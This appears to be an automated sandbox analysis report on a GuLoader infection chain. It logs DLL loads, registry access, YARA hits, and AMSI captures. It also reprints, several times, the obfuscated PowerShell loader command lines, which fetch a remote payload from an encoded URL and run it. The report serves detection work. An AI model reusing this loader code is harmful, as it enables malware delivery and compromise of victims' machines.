Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000007.00000002.2050424001.0000000002D40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071B6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Semiannually163 = 1;$Varityped='Subst", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000002.2765371278.0000000005800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2067203805.000000000A2B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2066487605.0000000008580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2054965837.0000000005C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nummerpladens)$global:Spaciously = [System.Text.Encoding]::ASCII.GetString($Spattled)$global:Epispastic=$Spaciously.substring(292846,28358)<#Seriously Beginger Zygodactyl Blgepap For
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Avisls $Arduousness $Memorandist), (Emulgatorernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hedensk = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cirkulrebrevets)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forreven, $false).DefineType($Counterpara
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nummerpladens)$global:Spaciously = [System.Text.Encoding]::ASCII.GetString($Spattled)$global:Epispastic=$Spaciously.substring(292846,28358)<#Seriously Beginger Zygodactyl Blgepap For
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les 